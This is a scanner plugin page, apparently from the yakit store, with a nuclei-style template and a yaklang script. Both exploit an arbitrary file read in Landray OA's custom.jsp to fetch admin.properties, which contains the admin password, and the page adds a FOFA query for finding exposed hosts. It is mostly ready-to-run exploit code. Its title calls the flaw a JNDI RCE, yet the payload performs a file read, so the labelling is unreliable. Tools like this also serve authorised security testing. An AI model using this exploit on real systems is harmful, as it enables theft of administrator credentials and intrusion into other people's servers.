yakit-store
yakit-store copied to clipboard
Published
20 hours ago •
yaklang
yaklang
landray-oa-admin-do-jndi-rce
id: landray-oa-admin-do-jndi-rce
info:
name: Landray-OA-admin-do-jndi-rce
author: 你是猪
severity: high
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20admin.do%20JNDI%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.html
metadata:
fofa-query: app="Landray-OA系统"
tags: landray,rce
requests:
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "password"
- "kmss.properties.encrypt.enabled"
condition: and
- type: status
status:
- 200
port scan plugin
yakit.AutoInitYakit()
handleCheck = func(target,port){ addr = str.HostPort(target, port) isTls = str.IsTLSServer(addr)
packet = `POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{params(target)}} User-Agent: Go-http-client/1.1 Content-Length: 60 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
`
rsp,req,_ = poc.HTTP(packet,
poc.params({"target":addr}),
poc.https(isTls),
poc.redirectTimes(0),
)
// dump(rsp)
if len(rsp) > 0 {
if str.MatchAllOfSubString(rsp, "password","kmss.properties.encrypt.enabled"){
yakit.Info("%v found 蓝凌OA custom.jsp 任意文件读取漏洞", addr)
risk.NewRisk(
addr,risk.title("蓝凌OA custom.jsp 任意文件读取漏洞"),
risk.severity("high"),
risk.titleVerbose("蓝凌OA custom.jsp 任意文件读取漏洞"),
risk.type("蓝凌OA"),
risk.details({
"target": addr,
"request": req,
"response": rsp,
}),
)
}
}
return
}
handle = func(result /* *fp.MatchResult */) { // handle match result if !result.IsOpen(){ return }
if len(result.Fingerprint.HttpFlows)>0{
handleCheck(result.Target,result.Port)
}
}
